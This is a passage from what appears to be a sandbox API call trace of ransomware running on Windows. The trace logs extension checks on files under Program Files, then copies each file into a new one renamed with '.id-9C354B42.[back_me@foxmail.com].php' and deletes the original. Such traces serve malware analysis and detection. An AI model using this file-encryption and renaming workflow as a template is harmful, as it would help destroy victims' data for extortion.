72 [0241.654] lstrlenW (lpString=".1cd") returned 4 [0241.654] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0241.654] lstrlenW (lpString=".jpg") returned 4 [0241.654] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0241.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0241.655] lstrlenW (lpString=".doc") returned 4 [0241.655] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.655] lstrlenW (lpString=".docx") returned 5 [0241.655] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0241.655] lstrlenW (lpString=".pdf") returned 4 [0241.655] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.655] lstrlenW (lpString=".xls") returned 4 [0241.655] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.655] lstrlenW (lpString=".xlsx") returned 5 [0241.655] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0241.655] lstrlenW (lpString=".ppt") returned 4 [0241.655] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0241.655] lstrlenW (lpString=".zip") returned 4 [0241.655] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.655] lstrlenW (lpString=".rar") returned 4 [0241.655] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.655] lstrlenW (lpString=".bz2") returned 4 [0241.655] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.655] lstrlenW (lpString=".7z") returned 3 [0241.655] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0241.655] lstrlenW (lpString=".dbf") returned 4 [0241.655] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0241.655] lstrlenW (lpString=".1cd") returned 4 [0241.655] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0241.655] lstrlenW (lpString=".jpg") returned 4 [0241.655] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.656] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.656] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0241.656] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0241.684] GetFileSizeEx (in: hFile=0x248, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=4096) returned 1 [0241.684] CloseHandle (hObject=0x248) returned 1 [0241.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui")) returned 0x20 [0241.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.684] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.685] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0241.685] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0241.685] lstrlenW (lpString=".doc") returned 4 [0241.685] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.685] lstrlenW (lpString=".docx") returned 5 [0241.685] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0241.685] lstrlenW (lpString=".pdf") returned 4 [0241.685] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.685] lstrlenW (lpString=".xls") returned 4 [0241.685] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.685] lstrlenW (lpString=".xlsx") returned 5 [0241.685] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0241.685] lstrlenW (lpString=".ppt") returned 4 [0241.686] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.686] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0241.686] lstrlenW (lpString=".zip") returned 4 [0241.686] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.686] lstrlenW (lpString=".rar") returned 4 [0241.686] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.686] lstrlenW (lpString=".bz2") returned 4 [0241.686] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.686] lstrlenW (lpString=".7z") returned 3 [0241.686] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.686] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0241.686] lstrlenW (lpString=".dbf") returned 4 [0241.686] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.686] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0241.686] lstrlenW (lpString=".1cd") returned 4 [0241.686] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.686] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0241.686] lstrlenW (lpString=".jpg") returned 4 [0241.686] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.686] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0241.686] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0241.686] lstrlenW (lpString=".doc") returned 4 [0241.686] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.686] lstrlenW (lpString=".docx") returned 5 [0241.686] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0241.686] lstrlenW (lpString=".pdf") returned 4 [0241.686] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.686] lstrlenW (lpString=".xls") returned 4 [0241.686] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.686] lstrlenW (lpString=".xlsx") returned 5 [0241.687] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0241.687] lstrlenW (lpString=".ppt") returned 4 [0241.687] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.687] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0241.687] lstrlenW (lpString=".zip") returned 4 [0241.687] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.687] lstrlenW (lpString=".rar") returned 4 [0241.687] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.687] lstrlenW (lpString=".bz2") returned 4 [0241.687] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.687] lstrlenW (lpString=".7z") returned 3 [0241.687] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.687] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0241.687] lstrlenW (lpString=".dbf") returned 4 [0241.687] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.687] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0241.687] lstrlenW (lpString=".1cd") returned 4 [0241.687] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.687] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0241.687] lstrlenW (lpString=".jpg") returned 4 [0241.687] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.687] Sleep (dwMilliseconds=0x64) [0241.815] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0241.815] lstrlenW (lpString="tabskb.dll") returned 10 [0241.815] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0241.842] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=448000) returned 1 [0241.846] CloseHandle (hObject=0x2b8) returned 1 [0241.846] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll")) returned 0x20 [0241.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.853] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 61 [0241.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 61 [0241.865] lstrlenW (lpString=".doc") returned 4 [0241.865] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0241.865] lstrlenW (lpString=".docx") returned 5 [0241.865] lstrcmpiW (lpString1=".docx", lpString2="b.dll") returned -1 [0241.865] lstrlenW (lpString=".pdf") returned 4 [0241.865] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0241.865] lstrlenW (lpString=".xls") returned 4 [0241.865] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0241.865] lstrlenW (lpString=".xlsx") returned 5 [0241.865] lstrcmpiW (lpString1=".xlsx", lpString2="b.dll") returned -1 [0241.865] lstrlenW (lpString=".ppt") returned 4 [0241.865] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0241.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 61 [0241.865] lstrlenW (lpString=".zip") returned 4 [0241.865] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0241.865] lstrlenW (lpString=".rar") returned 4 [0241.865] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0241.865] lstrlenW (lpString=".bz2") returned 4 [0241.865] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0241.865] lstrlenW (lpString=".7z") returned 3 [0241.865] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0241.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 61 [0241.865] lstrlenW (lpString=".dbf") returned 4 [0241.865] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0241.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 61 [0241.866] lstrlenW (lpString=".1cd") returned 4 [0241.866] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0241.866] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 61 [0241.866] lstrlenW (lpString=".jpg") returned 4 [0241.866] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0241.866] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 61 [0241.866] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 61 [0241.866] lstrlenW (lpString=".doc") returned 4 [0241.866] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0241.866] lstrlenW (lpString=".docx") returned 5 [0241.866] lstrcmpiW (lpString1=".docx", lpString2="b.dll") returned -1 [0241.866] lstrlenW (lpString=".pdf") returned 4 [0241.866] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0241.866] lstrlenW (lpString=".xls") returned 4 [0241.866] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0241.866] lstrlenW (lpString=".xlsx") returned 5 [0241.866] lstrcmpiW (lpString1=".xlsx", lpString2="b.dll") returned -1 [0241.866] lstrlenW (lpString=".ppt") returned 4 [0241.866] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0241.866] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 61 [0241.866] lstrlenW (lpString=".zip") returned 4 [0241.866] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0241.866] lstrlenW (lpString=".rar") returned 4 [0241.866] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0241.866] lstrlenW (lpString=".bz2") returned 4 [0241.866] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0241.866] lstrlenW (lpString=".7z") returned 3 [0241.867] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0241.867] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 61 [0241.867] lstrlenW (lpString=".dbf") returned 4 [0241.867] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0241.867] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 61 [0241.867] lstrlenW (lpString=".1cd") returned 4 [0241.867] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0241.867] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 61 [0241.867] lstrlenW (lpString=".jpg") returned 4 [0241.867] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0241.867] lstrcmpiW (lpString1=".DLL", lpString2=".php") returned -1 [0241.867] lstrlenW (lpString="IACOM2.DLL") returned 10 [0241.867] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0242.049] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=4289376) returned 1 [0242.049] CloseHandle (hObject=0x30c) returned 1 [0242.049] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll")) returned 0x20 [0242.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0242.050] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0242.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0242.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0242.050] lstrlenW (lpString=".doc") returned 4 [0242.050] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0242.050] lstrlenW (lpString=".docx") returned 5 [0242.050] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1 [0242.050] lstrlenW (lpString=".pdf") returned 4 [0242.050] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0242.050] lstrlenW (lpString=".xls") returned 4 [0242.050] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0242.050] lstrlenW (lpString=".xlsx") returned 5 [0242.050] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1 [0242.050] lstrlenW (lpString=".ppt") returned 4 [0242.050] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0242.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 66 [0242.050] lstrlenW (lpString=".zip") returned 4 [0242.050] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0242.050] lstrlenW (lpString=".rar") returned 4 [0242.050] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0242.050] lstrlenW (lpString=".bz2") returned 4 [0242.050] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0242.050] lstrlenW (lpString=".7z") returned 3 [0242.050] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0243.325] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0243.325] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0243.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0243.492] GetLastError () returned 0x0 [0243.492] ReadFile (in: hFile=0x2e8, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0xa2b58, lpOverlapped=0x0) returned 1 [0244.288] WriteFile (in: hFile=0x37c, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xa2b60, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xa2b60, lpOverlapped=0x0) returned 1 [0244.300] ReadFile (in: hFile=0x2e8, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0244.300] WriteFile (in: hFile=0x37c, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xea, lpOverlapped=0x0) returned 1 [0244.300] SetEndOfFile (hFile=0x37c) returned 1 [0244.301] CloseHandle (hObject=0x37c) returned 1 [0244.301] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0244.301] SetEndOfFile (hFile=0x2e8) returned 1 [0245.453] CloseHandle (hObject=0x2e8) returned 1 [0245.453] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0245.453] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll")) returned 1 [0245.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0245.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0245.454] lstrlenW (lpString=".doc") returned 4 [0245.454] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1 [0245.454] lstrlenW (lpString=".docx") returned 5 [0245.454] lstrcmpiW (lpString1=".docx", lpString2="v.rll") returned -1 [0245.454] lstrlenW (lpString=".pdf") returned 4 [0245.454] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1 [0245.454] lstrlenW (lpString=".xls") returned 4 [0245.454] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1 [0245.454] lstrlenW (lpString=".xlsx") returned 5 [0245.454] lstrcmpiW (lpString1=".xlsx", lpString2="v.rll") returned -1 [0245.454] lstrlenW (lpString=".ppt") returned 4 [0245.454] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1 [0245.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0245.454] lstrlenW (lpString=".zip") returned 4 [0245.454] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0245.454] lstrlenW (lpString=".rar") returned 4 [0245.454] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0245.454] lstrlenW (lpString=".bz2") returned 4 [0245.454] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1 [0245.454] lstrlenW (lpString=".7z") returned 3 [0245.454] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1 [0245.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0245.454] lstrlenW (lpString=".dbf") returned 4 [0245.454] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0245.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0245.455] lstrlenW (lpString=".1cd") returned 4 [0245.455] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1 [0245.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0245.455] lstrlenW (lpString=".jpg") returned 4 [0245.455] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1 [0245.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0245.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0245.455] lstrlenW (lpString=".doc") returned 4 [0245.455] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1 [0245.455] lstrlenW (lpString=".docx") returned 5 [0245.455] lstrcmpiW (lpString1=".docx", lpString2="v.rll") returned -1 [0245.455] lstrlenW (lpString=".pdf") returned 4 [0245.455] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1 [0245.455] lstrlenW (lpString=".xls") returned 4 [0245.455] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1 [0245.455] lstrlenW (lpString=".xlsx") returned 5 [0245.455] lstrcmpiW (lpString1=".xlsx", lpString2="v.rll") returned -1 [0245.455] lstrlenW (lpString=".ppt") returned 4 [0245.455] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1 [0245.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0245.455] lstrlenW (lpString=".zip") returned 4 [0245.455] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0245.455] lstrlenW (lpString=".rar") returned 4 [0245.455] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0245.455] lstrlenW (lpString=".bz2") returned 4 [0245.455] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1 [0245.455] lstrlenW (lpString=".7z") returned 3 [0245.455] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1 [0245.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0245.455] lstrlenW (lpString=".dbf") returned 4 [0245.456] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0245.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0245.456] lstrlenW (lpString=".1cd") returned 4 [0245.456] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1 [0245.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0245.456] lstrlenW (lpString=".jpg") returned 4 [0245.456] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1 [0245.456] lstrcmpiW (lpString1=".MID", lpString2=".php") returned -1 [0245.456] lstrlenW (lpString="EAST_01.MID") returned 11 [0245.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0247.269] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=6165) returned 1 [0247.269] CloseHandle (hObject=0x2e8) returned 1 [0247.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid")) returned 0x20 [0247.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0247.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0248.021] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0248.021] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, 